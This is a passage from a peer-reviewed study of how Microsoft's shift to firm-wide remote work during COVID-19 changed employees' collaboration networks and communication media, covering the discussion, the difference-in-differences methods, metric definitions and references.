The estimated causal effects of either an employee ( δ from equation ( 1 )) or their colleagues ( β from equation ( 1 )) switching to remote work on hours spent in scheduled meetings, the sum of scheduled meetings and unscheduled call hours, IMs sent, emails sent and estimated workweek hours ( a ), and hours spent in unscheduled calls ( b ). All effects were normalized by dividing by the average level of that variable in February. The symbols depict point estimates and the lines show the 95% CIs. n  = 61,182 for all variables. The full results are provided in Supplementary Table 3 .

Our results suggest that shifting to firm-wide remote work caused the collaboration network to become more heavily siloed—with fewer ties that cut across formal business units or bridge structural holes in Microsoft’s informal collaboration network—and that those silos became more densely connected. Furthermore, the network became more static, with fewer ties added and deleted per month. Previous research suggests that these changes in collaboration patterns may impede the transfer of knowledge 10 , 12 , 13 and reduce the quality of workers’ output 11 , 23 . Our results also indicate that the shift to firm-wide remote work caused synchronous communication to decrease and asynchronous communication to increase. Not only were the communication media that workers used less synchronous, but they were also less ‘rich’ (for example, email and IM). These changes in communication media may have made it more difficult for workers to convey and process complex information 26 , 27 , 28 .

We expect that the effects we observe on workers’ collaboration and communication patterns will impact productivity and, in the long-term, innovation. Yet, across many sectors, firms are making decisions to adopt permanent remote work policies based only on short-term data 52 . Importantly, the causal estimates that we report are substantially different compared with the effects suggested by the observational trends shown in Figs. 2 and 4 . Thus, firms making decisions on the basis of non-causal analyses may set suboptimal policies. For example, some firms that choose a permanent remote work policy may put themselves at a disadvantage by making it more difficult for workers to collaborate and exchange information.

Beyond estimating the causal effects of firm-wide remote work, our results also provide preliminary insights into the effects of remote work policies such as mixed-mode and hybrid work. Specifically, the non-trivial collaborator effects that we estimate suggest that hybrid and mixed-mode work arrangements may not work as firms expect. The most effective implementations of hybrid and mixed-mode work might be those that deliberately attempt to minimize the impact of collaborator effects on those employees that are not working remotely; for example, firms might consider implementations of hybrid work in which certain teams come into the office on certain days, or in which most or all workers come into the office on some days and work remotely otherwise. Firms might also consider arrangements in which only certain types of workers (for example, individual contributors) are able to work remotely.

Although we believe these early insights are helpful, firms and academics will need to undertake a combination of quantitative and qualitative research once the COVID-19 pandemic has ended to better measure both the benefits and the downsides of different remote work policies. Large firms with the ability to collect rich telemetry data will be particularly well-positioned to build on the quantitative insights presented in this work by conducting large-scale internal field experiments. If published externally, these experiments could have the capacity to greatly further our collective understanding of the causal effects of both firm-wide remote work and other work arrangements such as hybrid work and mixed-mode work. Our results, which report both direct effects and indirect effects of remote work, suggest that such experimentation needs to be conducted carefully. Simply comparing the work practices and/or productivity levels of remote workers and office workers will likely yield biased estimates of the global treatment effects of different remote work policies, due to the causal effects of one’s colleagues working remotely. In conducting these experiments, it is crucial that firms use experiment designs that are optimized for capturing the overall effects of remote work policies, for example, graph cluster randomization 53 , 54 or switchback randomization 55 . Ideally, such field experiments would be complemented with high-quality qualitative research that can describe emergent processes and workers’ perceptions and, more generally, uncover insights beyond those that can be obtained through quantitative methods.

Our research is not without its limitations. First, our study characterizes the impacts of firm-wide remote work on the US employees of one major technology firm. Although we expect our results to generalize to other technology firms, this may not be the case. Caution should also be exercised in generalizing our results to other sectors and other countries. Second, the period of time over which we measured the causal effects of remote work are quite short (three months), and it is possible that the long-term effects of firm-wide remote work are different. For example, at the beginning of the pandemic, workers were able to leverage existing network connections, many of which were built in person. This may not be possible if firm-wide remote work were implemented long-term. Third, our analysis treats the effects of firm-wide remote work on peoples’ collaboration networks and communication media usage as separate, whereas these two types of effects may interact and exacerbate one another. Fourth, although we believe that changes to workers’ communication networks and media will affect productivity and innovation, we were unable to measure these outcomes directly. Even if we were able to measure productivity and innovation, the impacts of network structure and communication media choice on performance are likely contingent on a number of factors, including the type of task a given team/organization is trying to complete 56 , 57 , 58 , 59 . Finally, our ability to make causal claims is predicated on the validity of our modified DiD framework’s identifying assumptions: parallel trends, conditional exogeneity after matching and additively separable effects. Although we have taken steps to verify the plausibility of these assumptions and tested the robustness of our results to an alternative matching procedure 60 (details of which are provided in the Methods ), they are assumptions nonetheless.

There are multiple high-profile cases of firms such as IBM and Yahoo! enacting, but ultimately rescinding, flexible remote work policies before COVID-19, presumably due to the impacts of these policies on communication and collaboration 61 , 62 . On the basis of these examples, one might conclude that the current enthusiasm for remote work may not ultimately translate into a long-lasting shift to remote work for the majority of firms. However, during the COVID-19 pandemic, workers and firms have invested in the physical and human capital required to support remote work 63 and innovation has shifted toward new technologies that support remote work 64 . Both of these factors make it more likely that for many firms, some version of remote work will persist beyond the pandemic. In light of this fact, the importance of deepening our understanding of remote work and its impacts has never been greater.

Ethical review

This research was reviewed and classified as exempt by the Massachusetts institute of Technology (MIT) Committee on the Use of Humans as Experimental Subjects (that is, MIT’s Institutional Review Board), because the research was secondary use research involving the use of de-identified data.

Our data were passively collected and anonymized by Microsoft’s Workplace Analytics product 65 , which logs activity that takes place in employees’ work email accounts and in Microsoft Teams using de-identified IDs. Microsoft Teams is collaboration software that enables employees to video/audio call, video/audio teleconference, IM and share files. The use of the data is compliant with US employee privacy laws. Employee privacy restrictions in many countries prevent us from reporting on workers outside the US. However, an employee’s communication and collaboration with international coworkers is still included in the data and those employees are still counted as part of each employee’s network. No information on international coworkers except for counting interactions with US employees was obtained for research purposes or analysed. Microsoft provides employees with appropriate notice of its use of Workplace Analytics, and sets strict controls over the collection and use of such data.

In our collaboration network, each worker is a node. For a tie to exist between two workers in a given month, those two workers must have had at least one meaningful interaction through two out of the following four communication media: email, IM, scheduled meeting and unscheduled video/audio call. A meaningful interaction is an email, IM, scheduled meeting or unscheduled video/audio call with a group of size no more than eight.

In our analysis, we classify a worker as working remotely if more than 80% of their collaboration hours in a given month are with colleagues remote to them. For employees WFH, all of their colleagues are considered to be remote from them, whereas, for those in an office, colleagues are remote to them if those colleagues are WFH or are located on a Microsoft campus in a different city. After March 2020, all US Microsoft employees are by definition working remotely, as they are WFH.

Modified DiD model

Our modified DiD model extends the standard DiD model in two ways. First, rather than measuring the effect of changes in one treatment variable, our model measures the effects of changes in two different treatment variables—(1) whether an employee is working remotely and (2) whether that employee’s colleagues are working remotely—and assumes that these two effects are additively separable. Second, our model allows the variation in our treatment variables to be induced by one exogenous shock that affects all workers in our sample, but affects some workers differently compared with others. More specifically, although all Microsoft employees were affected by COVID-19, only some employees experienced changes in their remote work status and/or the share of their collaborators that were working remotely due to Microsoft’s company-wide WFH mandate during the pandemic.

We estimate the average treatment effect for the treated (ATT) of ego remote work and collaborator remote work on all outcome measures using the following specification:

where Y i t denotes the work outcome, α i is an employee fixed-effect, τ t is a month fixed effect, D i t indicates whether employee i was a treated employee forced to work remotely in month t , s i t is the share of employee i ’s coworkers who were working remotely in month t and ϵ i t denotes the error term. Observations are weighted using coarsened exact matching (CEM) weights, and standard errors are clustered at the level of an employee’s manager. We estimate this model using data from February, April, May and June 2020. We omitted March because workers were transitioning from office work to WFH beginning in the first week of the month.

Our ability to causally identify both ATTs is predicated on a number of identifying assumptions, some of which are standard in DiD analyses and some of which are specific to our research setting. First, we assume that, for both of our ‘treatment’ variables, the time series for ‘treated’ and ‘untreated’ workers would have evolved in parallel absent the treatment. Time-series trends for different subsets of the matched sample are compared in Fig. 1 . These comparisons suggest that, for both of our treatment variables, the DiD model’s parallel trends assumption is plausible, both when measuring the effect of the treatment on network measures (Fig. 1a,c ) and when measuring the effect of the treatment on communication media measures (Figs. 1b,d ). Analogous figures for our full set of outcome variables are provided in Supplementary Figs. 5 – 19 . In all cases, the time series appear to move in parallel both before the transition to remote work, and once the transition to remote work concluded, suggesting that this identifying assumption is reasonable.

Second, we assume strict exogeneity, that is, that the timing of the switch to remote work must be independent of employees’ outcomes. As the ‘treatment group’ was all switched to WFH due to COVID-19, we are less concerned about endogeneity of treatment than we might be in other settings. However, we do need to assume that workers’ remote work status before the pandemic and the percentage of workers’ colleagues that work remotely before the pandemic are independent of how they are affected by the pandemic. This assumption would be violated if, for example, those who worked remotely before the pandemic were less likely to have unforeseen childcare responsibilities from school closures caused by the pandemic. To make this identifying assumption more plausible, we use the CEM procedure described below. If we wanted to interpret the ATTs that we estimate from those employees that started WFH due to the pandemic as average treatment effects, we would also need to assume that, conditional on the CEM procedure described below, employees’ pre-pandemic remote work status and the percentage of colleagues working remotely were independent of the effects of ego remote work and collaborator remote work on their work outcomes.

Finally, we assume that ego remote work effects, collaborator remote work effects and non-remote-work-related COVID-19 effects are additively separable. More precisely, we assume that Y i t can be written as

where RW i t is a binary variable that indicates whether employee i is working remotely at time t , s i t is the share of employee i ’s collaborators working remotely in month t , C i t is a binary variable indicating whether employee i was subject to the COVID-19 pandemic at time t and Y i t (0, 0, 0) is worker i ’s outcome at time t if all three variables were equal to 0. This assumption is an extension of the standard DiD assumption that treatment effects, cross-group differences and time-effects are additively separable and would be violated if, for example, the effects of ego remote work and/or collaborator remote work were amplified in a multiplicative manner due to other aspects of the COVID-19 pandemic (for example, childcare responsibilities or pandemic-induced changes to Microsoft’s product roadmaps). With our data, we are unable to validate the plausibility of this important identifying assumption; however, it is worth noting that causal estimates produced by standard DiD models also rely on the validity of parametric assumptions 66 .

The results from our modified DiD specification for the full set of outcomes are provided in Supplementary Tables 1 – 3 . Throughout the main text, we refer to results as insignificant when two-sided P  >0.05.

We make our results more robust by estimating our DiD model using weights generated using CEM 67 . This reweighting means that we can relax the parallel trends and exogeneity assumptions described above to only be required conditional on employee characteristics. In other words, provided that any differences in how the two groups would have evolved in the absence of the pandemic or how they are affected by the pandemic are entirely explained by the employee characteristics we match on, then the CEM-based results are valid.

The CEM procedure works as follows. Each US Microsoft employee is assigned to a stratum on the basis of their role, managerial status, seniority level and tenure at Microsoft as of February 2020. For each employee i in a stratum s that contains a mixture of employees that were and were not remote before the COVID-19 pandemic, we construct a CEM weight according to the following formula:

where n O ( n R ) is the total number of non-remote (remote) employees before the COVID-19 pandemic, \({n}_{O}^{s}\) ( \({n}_{R}^{s}\) ) is the total number of non-remote (remote) employees before the COVID-19 pandemic in stratum s and O s ( R s ) is the set of non-remote (remote) employees before the COVID-19 pandemic in stratum s . The 97 (<0.2%) employees in strata without both non-remote and remote employees before the COVID-19 pandemic were discarded from our sample. The final remote:non-remote sample ratio is 1:4.6.

Treatment effect heterogeneity

We measured treatment effect heterogeneity with respect to tenure at Microsoft (shorter tenure versus longer tenure), managerial status (manager versus individual contributor) and role type (engineering versus non-engineering). To do so, we estimated the DiD model separately for each subgroup. Our treatment effect estimates for each combination of outcome and subgroup are provided in Supplementary Tables 4 – 23 .

Alternative matching procedure

To test the robustness of our analysis, we re-estimate our main DiD specification on an alternate matched sample of employees who worked remotely before the COVID-19 pandemic, which is constructed using a more extensive matching procedure introduced in ref. 60 . In this matching procedure, we augment the set of observables that we match on to include not only time-invariant employee attributes (that is, role, managerial status, seniority and new-hire status as of February), but also time-varying behavioural attributes (that is, number of scheduled meeting hours, unscheduled call hours, IMs sent, emails sent, workweek hours, network ties, business groups connected to, cross-group connections, bridging ties, churned ties and added ties, share of time with cross-group ties, bridging ties, weak ties and added ties, and the individual clustering coefficient) as measured in June 2020. As we are matching on many more variables, there are more employees who cannot be matched, and our matched sample includes only 43,576 employees.

The motivation for this matching procedure is as follows. In a standard matched DiD analysis, control and treatment units would be matched on the basis of pretreatment behaviour. This type of matching is not appropriate in our context, given that employees who did and did not work remotely before the COVID-19 pandemic are by definition in different potential outcome states in February. Assuming that there is a treatment effect to detect, matching on pretreatment behavioural outcomes would actually make our identifying assumptions less likely to hold. However, in June 2020, both employees who were and were not working remotely before the COVID-19 pandemic were in the same potential outcome state (firm-wide remote work), and therefore matching on time-varying behavioural outcomes improves the credibility of our identifying assumptions.

Supplementary Figs. 20 and 21 show the results of our DiD model as estimated on this alternative sample. The results are qualitatively similar to those we present in our main analysis.

Collaboration network outcome definitions

Number of connections: The number of people with whom one had a meaningful interaction through at least two out of four possible communication media (email, IM, scheduled meeting and unscheduled video/audio call) in a given month. A meaningful interaction is an email, meeting, video/audio call or IM with a group of size no more than eight.

Number of business groups and cross-group connections: A business group is a collection of typically fewer than ten employees who report to the same manager and share a common purpose. We look at the number of distinct business groups that one’s immediate collaborators belong to, and the number of one’s collaborators that belong to a different business group than one’s own.

Bridging connections: Bridging connections are connections with a low value of the local constraint 9 , 18 , 42 in that period. To calculate the local constraint, we first calculate the normalized mutual weight, NMW i j t , between each pair of people i and j in each period t . If there is no connection between i and j in period t , then NMW i j t  = 0, otherwise \({\mathrm{NMW}}_{ijt}=\frac{2}{{n}_{it}+{n}_{jt}}\) , where n i t is the number of connections i has in period t . Then, for each i , j , t , we calculate the local constraint \({{\mathrm {{LC}}_{ijt}}} = {\mathrm {NMW}}_{ijt} + {\sum }_{k} {{{\mathrm {NMW}}}_{ikt}} \times {{\mathrm {NMW}}_{kjt}}\) . We define a global cut-off \(\widehat{\mathrm{LC}}\) on the basis of the median value of the constraint across all directed ties in February and categorize a connection as bridging if its local constraint is below that cut-off. We calculate the local constraint for each tie using the matricial formulae described in ref. 68 .

Individual clustering coefficient: The number of triads (group of three people who are all connected to each other) a person is a part of as a share of the number of triads they could possibly be part of given their degree. If a i j t is a dummy that equals 1 if and only if there is a connection between i and j in period t and n i t is the number of connections i has in period t , then individual i ’s clustering coefficient in period t is \({\mathrm{CC}}_{it}=\frac{2}{{n}_{it}({n}_{it}-1)}\mathop{\sum}\limits_{j,k}{a}_{ijt}\times {a}_{jkt}\times {a}_{kit}\) .

Number of churned connections: The number of people with whom a worker had a connection with in month t  − 1, but does not have a connection in month t .

Number of added connections: The number of people with whom a worker has a connection in month t , but did not have a connection in month t  − 1.

Distribution of collaboration time: In addition to unweighted network ties, we also measured the share of collaboration time that an individual spent with each of their collaborators. The number of collaboration hours is calculated by summing up the number of hours spent communicating by email or IM, in meetings and in video/audio calls. If h i j t is the number of hours that individual i spent with collaborator j in month t , then the share of collaboration time i spent with j is \({P}_{ijt}=\frac{{h}_{ijt}}{{\sum }_{k}{h}_{ikt}}\) , from which we can define the following metrics:

Share of time with own-group connections: The share of time spent with collaborators in the same business group (see the above definition), \({\mathrm{SG}}_{it}=\mathop{\sum}\limits_{j| {g}_{j}={g}_{i}}{P}_{ijt}\) , where g i is the business group that individual i belongs to.

Share of time with bridging connections: The share of collaboration time spent with collaborators with whom the local constraint (as defined under ‘bridging connections’) is below the February median \({\mathrm{BC}}_{it}=\mathop{\sum}\limits_{j| {\mathrm{LC}}_{ijt} < \widehat{\mathrm{LC}}}{P}_{ijt}\) .

Share of time with weak ties: The share of a person’s collaboration hours spent with the half of the people that they collaborate with the least during month t , \({\mathrm{ST}}_{it}=\mathop{\sum}\limits_{j| {P}_{ijt} < {P}_{it}^{m}}{P}_{ijt}\) , where \({P}_{it}^{m}\) is the time that i spends with their median connection in period t . We do not analyse the number of weak ties a person has in a given month as, by this definition, it is equal to half the number of ties they have in that month.

Share of time with added connections: The share of a person’s collaboration hours spent with people with whom they did not have a connection in the previous month, \({\mathrm{SA}}_{it}=\mathop{\sum}\limits_{j\notin {n}_{i,t-1}}{P}_{ijt}\) , where n i , t  − 1 is the set of i ’s collaborators in period t  − 1.

Entropy of an individual’s collaboration time (network entropy): The entropy 48 of the distribution of the hours spent with one’s collaborators, \({E}_{it}=-{\sum }_{j}{P}_{ijt}\times {{\mathrm{log}}}\,{P}_{ijt}\) .

Concentration of an individual’s collaboration time: A normalized version of the HHI 47 of the hours spent with one’s collaborators, \({\mathrm{HHI}}_{it}=\frac{1}{{n}_{it}-1}\left({n}_{it}\times {\sum }_{j}{P}_{ijt}^{2}-1\right)\) , where n i t is the number of i ’s collaborators in period t . The normalization ensures that HHI i t always falls between 0 and 1.

Communication media outcome definitions

Scheduled meeting hours: The number of hours that a person spent in meetings scheduled through Teams or Outlook calendar with at least one other person. Before firm-wide remote work, employees were able to participate in meetings both in-person and by video/audio call. After the shift to firm-wide remote work, all meetings take place entirely by video/audio call.

Unscheduled call hours: The number of hours a person spent in unscheduled video/audio calls through Microsoft Teams with at least one other person.

Emails sent: The number of emails a person sent through their work email account.

IMs sent: The number of IMs a person sent through Microsoft Teams.

Workweek hours: The sum across every day in the workweek of the time between a person’s first sent email or IM, scheduled meeting or Microsoft Teams video/audio call, and the last sent email or IM, scheduled meeting or Microsoft Teams video/audio call. A day is part of the workweek if it is a ‘working day’ for a given employee based on their work calendar.

Reporting Summary

Further information on research design is available in the Nature Research Reporting Summary linked to this article.

Data availability

An anonymized version of the data supporting this study is retained indefinitely for scientific and academic purposes. The data are not publicly available due to employee privacy and other legal restrictions. The data are available from the authors on reasonable request and with permission from Microsoft Corporation.

Code availability

The code supporting this study is retained indefinitely for scientific and academic purposes. The code is not publicly available due to employee privacy and other legal restrictions. The code is available from the authors on reasonable request and with permission from Microsoft Corporation.

Change history

05 october 2021.

A Correction to this paper has been published: https://doi.org/10.1038/s41562-021-01228-z

Bloom, N. A. Working From Home and the Future of U.S. Economic Growth Under COVID (2020); https://www.youtube.com/watch?v=jtdFIZx3hyk

Brynjolfsson, E. et al. COVID-19 and Remote Work: An Early Look at US Data. Technical Report (National Bureau of Economic Research, 2020).

Barrero, J. M., Bloom, N. & Davis, S. 60 million fewer commuting hours per day: how Americans use time saved by working from home. Working Paper (Univ. Chicago Becker Friedman Institute for Economics, 2020); https://bfi.uchicago.edu/wp-content/uploads/2020/09/BFI_WP_2020132.pdf

Dingel, J. I. & Neiman, B. How many jobs can be done at home? J. Public Econ. 189 , 104235 (2020).

Article   Google Scholar  

Benveniste, A. These companies’ workers may never go back to the office. CNN (18 October 2020); https://cnn.it/3jIobzJ

McLean, R. These companies plan to make working from home the new normal. As in forever. CNN (25 June 2020); https://cnn.it/3ebJU27

Lund, S., Cheng, W.-L., André Dua, A. D. S., Robinson, O. & Sanghvi, S. What 800 executives envision for the postpandemic workforce. McKinsey Global Institute (23 September 2020); https://www.mckinsey.com/featured-insights/future-of-work/what-800-executives-envision-for-the-postpandemic-workforce

Granovetter, M. The strength of weak ties. Am. J. Sociol. 78 , 1360–1380 (1973).

Burt, R. S. Structural holes and good ideas. Am. J. Sociol. 110 , 349–399 (2004).

Reagans, R. & McEvily, B. Network structure and knowledge transfer: the effects of cohesion and range. Admin. Sci. Q. 48 , 240–267 (2003).

Uzzi, B. & Spiro, J. Collaboration and creativity: the small world problem. Am. J. Sociol. 111 , 447–504 (2005).

Argote, L. & Ingram, P. Knowledge transfer: a basis for competitive advantage in firms. Organ. Behav. Hum. Dec. Process. 82 , 150–169 (2000).

Hansen, M. T. The search-transfer problem: the role of weak ties in sharing knowledge across organization subunits. Admin. Sci. Q. 44 , 82–111 (1999).

Krackhardt, D. The strength of strong ties. in Networks in the Knowledge Economy (Oxford Univ. Press, 2003).

Levin, D. Z. & Cross, R. The strength of weak ties you can trust: the mediating role of trust in effective knowledge transfer. Manage. Sci. 50 , 1477–1490 (2004).

McFadyen, M. A. & Cannella Jr, A. A. Social capital and knowledge creation: diminishing returns of the number and strength of exchange relationships. Acad. Manage. J. 47 , 735–746 (2004).

Google Scholar  

Granovetter, M. The strength of weak ties: a network theory revisited. in Social Structure and Network Analysis 105–130 (Sage, 1982).

Burt, R. S. Structural Holes: The Social Structure of Competition (Harvard Univ. Press, 2009)

Baum, J. A., McEvily, B. & Rowley, T. J. Better with age? Tie longevity and the performance implications of bridging and closure. Organ. Sci. 23 , 529–546 (2012).

Kneeland, M. K. Network Churn: A Theoretical and Empirical Consideration of a Dynamic Process on Performance . PhD thesis, New York University (2019).

Kumar, P. & Zaheer, A. Ego-network stability and innovation in alliances. Acad. Manage. J. 62 , 691–716 (2019).

Burt, R. S. & Merluzzi, J. Network oscillation. Acad. Manage. Discov. 2 , 368–391 (2016).

Soda, G. B., Mannucci, P. V. & Burt, R. Networks, creativity, and time: staying creative through brokerage and network rejuvenation. Acad. Manage. J. https://doi.org/10.5465/amj.2019.1209 (2021).

Zeng, A., Fan, Y., Di, Z., Wang, Y. & Havlin, S. Fresh teams are associated with original and multidisciplinary research. Nat. Hum. Behav. https://doi.org/10.1038/s41562-021-01084-x (2021).

Levin, D. Z., Walter, J. & Murnighan, J. K. Dormant ties: the value of reconnecting. Organ. Sci. 22 , 923–939 (2011).

Lengel, R. H. & Daft, R. L. An Exploratory Analysis of the Relationship Between Media Richness and Managerial Information Processing . Technical Report (Texas A&M Univ. Department of Management, 1984).

Daft, R. L. & Lengel, R. H. Organizational information requirements, media richness and structural design. Manage. Sci. 32 , 554–571 (1986).

Dennis, A. R., Fuller, R. M. & Valacich, J. S. Media, tasks, and communication processes: a theory of media synchronicity. MIS Q. 32 , 575–600 (2008).

Morris, M., Nadler, J., Kurtzberg, T. & Thompson, L. Schmooze or lose: social friction and lubrication in e-mail negotiations. Group Dyn. Theor. Res. Pract. 6 , 89–100 (2002).

Pentland, A. The new science of building great teams. Harvard Bus. Rev. 90 , 60–69 (2012).

Allen, T. D., Golden, T. D. & Shockley, K. M. How effective is telecommuting? Assessing the status of our scientific findings. Psychol. Sci. Publ. Int. 16 , 40–68 (2015).

Ahuja, M. K. & Carley, K. M. Network structure in virtual organizations. Organ. Sci. 10 , 741–757 (1999).

Ahuja, M. K., Galletta, D. F. & Carley, K. M. Individual centrality and performance in virtual R&D groups: an empirical study. Manage. Sci. 49 , 21–38 (2003).

Suh, A., Shin, K.-s, Ahuja, M. & Kim, M. S. The influence of virtuality on social networks within and across work groups: a multilevel approach. J. Manage. Inform. Syst. 28 , 351–386 (2011).

DeFilippis, E., Impink, S., Singell, M., Polzer, J. T. & Sadun, R. Collaborating During Coronavirus: The Impact of COVID-19 on the Nature of Work. Working Paper 21-006 (Harvard Business School Organizational Behavior Unit, 2020).

Bernstein, E., Blunden, H., Brodsky, A., Sohn, W. & Waber, B. The implications of working without an office. Harvard Business Review (15 July 2020); https://hbr.org/2020/07/the-implications-of-working-without-an-office

Larson, J. et al. Dynamic silos: modularity in intra-organizational communication networks before and during the COVID-19 pandemic. Preprint at https://arxiv.org/abs/2104.00641 (2021).

Bloom, N., Liang, J., Roberts, J. & Ying, Z. J. Does working from home work? Evidence from a Chinese experiment. Q. J. Econ. 130 , 165–218 (2015).

Choudhury, P., Foroughi, C. & Larson, B. Z. Work-from-anywhere: the productivity effects of geographic flexibility. Acad. Manage. Proc. 2020 , 21199 (2020).

Kleinbaum, A. M., Stuart, T. & Tushman, M. Communication (and Coordination?) in a Modern, Complex Organization (Harvard Business School, 2008).

McEvily, B., Soda, G. & Tortoriello, M. More formally: rediscovering the missing link between formal organization and informal social structure. Acad. Manage. Ann. 8 , 299–345 (2014).

Everett, M. G. & Borgatti, S. P. Unpacking Burt’s constraint measure. Social Netw. 62 , 50–57 (2020).

Onnela, J.-P. et al. Structure and tie strengths in mobile communication networks. Proc. Natl Acad. Sci. USA 104 , 7332–7336 (2007).

Article   CAS   Google Scholar  

Aral, S. & Van Alstyne, M. The diversity-bandwidth trade-off. Am. J. Sociol. 117 , 90–171 (2011).

Brashears, M. E. & Quintane, E. The weakness of tie strength. Social Netw. 55 , 104–115 (2018).

Burke, M. & Kraut, R. E. Growing closer on Facebook: changes in tie strength through social network site use. In Proc. SIGCHI Conference on Human Factors in Computing Systems 4187–4196 (ACM, 2014); https://dl.acm.org/doi/10.1145/2556288.2557094

Herfindahl, O. C. Concentration in the Steel Industry . PhD thesis, Columbia University (1950).

Shannon, C. E. A mathematical theory of communication. Bell Syst. Tech. J. 27 , 379–423 (1948).

Herbsleb, J. D. & Mockus, A. An empirical study of speed and communication in globally distributed software development. IEEE Trans. Softw. Eng. 29 , 481–494 (2003).

Ehrlich, K. & Cataldo, M. All-for-one and one-for-all? A multi-level analysis of communication patterns and individual performance in geographically distributed software development. In Proc. ACM 2012 Conf. Computer Supported Cooperative Work 945–954 (ACM, 2012); https://doi.org/10.1145/2145204.2145345

Cataldo, M. & Herbsleb, J. D. Communication networks in geographically distributed software development. In Proc. 2008 ACM Conf. Computer Supported Cooperative Work 579–588 (ACM, 2008).

Kolko, J. Remote job postings double during coronavirus and keep rising. Indeed Hiring Lab (16 March 2021); https://www.hiringlab.org/2021/03/16/remote-job-postings-double/

Ugander, J., Karrer, B., Backstrom, L. & Kleinberg, J. Graph cluster randomization: network exposure to multiple universes. In Proc. 19th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining 329–337 (2013); https://doi.org/10.1145/2487575.2487695

Eckles, D., Karrer, B. & Ugander, J. Design and analysis of experiments in networks: reducing bias from interference. J. Causal Inference https://doi.org/10.1515/jci-2015-0021 (2016).

Bojinov, I., Simchi-Levi, D. & Zhao, J. Design and analysis of switchback experiments. Preprint at SSRN https://doi.org/10.2139/ssrn.3684168 (2020).

Lechner, C., Frankenberger, K. & Floyd, S. W. Task contingencies in the curvilinear relationships between intergroup networks and initiative performance. Acad. Manage. J. 53 , 865–889 (2010).

Chung, Y. & Jackson, S. E. The internal and external networks of knowledge-intensive teams: the role of task routineness. J. Manage. 39 , 442–468 (2013).

Dennis, A. R., Wixom, B. H. & Vandenberg, R. J. Understanding fit and appropriation effects in group support systems via meta-analysis. MIS Q. 25 , 167–193 (2001).

Fuller, R. M. & Dennis, A. R. Does fit matter? The impact of task-technology fit and appropriation on team performance in repeated tasks. Inform. Syst. Res. 20 , 2–17 (2009).

Athey, S., Mobius, M. M. & Pál, J. The impact of aggregators on Internet news consumption. Preprint at SSRN https://papers.ssrn.com/sol3/papers.cfm?abstract_id=2897960 (2017).

Swisher, K. Physically together: here’s the internal Yahoo no-work-from-home memo for remote workers and maybe more. All Things (22 February 2013).

Simons, J. IBM, a pioneer of remote work, calls workers back to the office. Wall Street Journal (18 May 2017).

Barrero, J. M., Bloom, N. & Davis, S. J. Why working from home will stick. Working Paper (Univ. Chicago, Becker Friedman Institute for Economics, 2020).

Bloom, N., Davis, S. J. & Zhestkova, Y. COVID-19 shifted patent applications toward technologies that support working from home. Working Paper (Univ. Chicago, Becker Friedman Institute for Economics, 2020).

Workplace Analytics https://docs.microsoft.com/en-us/workplace-analytics/use/metric-definitions (Microsoft, 2021).

Athey, S. & Imbens, G. W. Identification and inference in nonlinear difference-in-differences models. Econometrica 74 , 431–497 (2006).

Iacus, S. M., King, G. & Porro, G. Causal inference without balance checking: coarsened exact matching. Polit. Anal. 20 , 1–24 (2012).

Muscillo, A. A note on (matricial and fast) ways to compute Burt’s structural holes. Preprint at https://arxiv.org/abs/2102.05114 (2021).

Download references

Acknowledgements

This work was a part of Microsoft’s New Future of Work Initiative. We thank D. Eckles for assistance; N. Baym for illuminating discussions regarding social capital; and the attendees of the Berkeley Haas MORS Macro Research Lunch and the organizers and attendees of the NYU Stern Future of Work seminar for their comments and feedback. The authors received no specific funding for this work.

Author information

Authors and affiliations.

Microsoft Corporation, Redmond, WA, USA

Longqi Yang, Sonia Jaffe, Siddharth Suri, Shilpi Sinha, Jeffrey Weston, Connor Joyce, Neha Shah, Kevin Sherman, Brent Hecht & Jaime Teevan

Haas School of Business, University of California, Berkeley, CA, USA

David Holtz

MIT Initiative on the Digital Economy, Cambridge, MA, USA

You can also search for this author in PubMed   Google Scholar

Contributions

L.Y. analysed the data. L.Y., D.H., S.J. and S. Suri performed the research design, interpretation and writing. S. Sinha, J.W., C.J., N.S. and K.S. provided data access and expertise. B.H. and J.T. advised and sponsored the project.

Corresponding author

Correspondence to Longqi Yang .

Ethics declarations

Competing interests.

L.Y., S.J., S. Suri, S. Sinha, J.W., C.J., N.S., K.S., B.H. and J.T. are employees of and have a financial interest in Microsoft. D.H. was previously a Microsoft intern. All of the authors are listed as inventors on a pending patent application by Microsoft Corporation (16/942,375) related to this work.

Additional information

Peer review information Nature Human Behaviour thanks Nick Bloom, Yvette Blount and Sandy Staples for their contribution to the peer review of this work. Peer reviewer reports are available.

Publisher’s note Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.

Supplementary information

Supplementary information.

Supplementary Figs. 1–21 and Supplementary Tables 1–25.

Peer Review Information

Rights and permissions.

Reprints and permissions

About this article

Cite this article.

Yang, L., Holtz, D., Jaffe, S. et al. The effects of remote work on collaboration among information workers. Nat Hum Behav 6 , 43–54 (2022). https://doi.org/10.1038/s41562-021-01196-4

Download citation

Received : 02 November 2020

Accepted : 16 August 2021

Published : 09 September 2021

Issue Date : January 2022

DOI : https://doi.org/10.1038/s41562-021-01196-4

Share this article

Anyone you share the following link with will be able to read this content:

Sorry, a shareable link is not currently available for this article.

Provided by the Springer Nature SharedIt content-sharing initiative

This article is cited by

Accelerated demand for interpersonal skills in the australian post-pandemic labour market.

  • David Evans
  • Claire Mason
  • Andrew Reeson

Nature Human Behaviour (2024)

Post-pandemic acceleration of demand for interpersonal skills

Securing the remote office: reducing cyber risks to remote working through regular security awareness education campaigns.

  • Giddeon Njamngang Angafor
  • Iryna Yevseyeva
  • Leandros Maglaras

International Journal of Information Security (2024)

Challenges for Inclusive Organizational Behavior (IOB) in Terms of Supporting the Employment of People with Disabilities by Enhancing Remote Working

  • Frączek Bożena

Social Indicators Research (2024)

Adding virtual plants leads to higher cognitive performance and psychological well-being in virtual reality

  • Fariba Mostajeran
  • Frank Steinicke
  • Simone Kühn

Scientific Reports (2023)

Quick links

  • Explore articles by subject
  • Guide to authors
  • Editorial policies

Sign up for the Nature Briefing newsletter — what matters in science, free to your inbox daily.

microsoft research report

  • Threat intelligence
  • Microsoft Copilot for Security
  • Threat actors

Staying ahead of threat actors in the age of AI

  • By Microsoft Threat Intelligence
  • AI and machine learning
  • Attacker techniques, tools, and infrastructure
  • Social engineering / phishing
  • Forest Blizzard (STRONTIUM)
  • MITRE ATT&CK
  • Non-governmental organizations (NGOs)

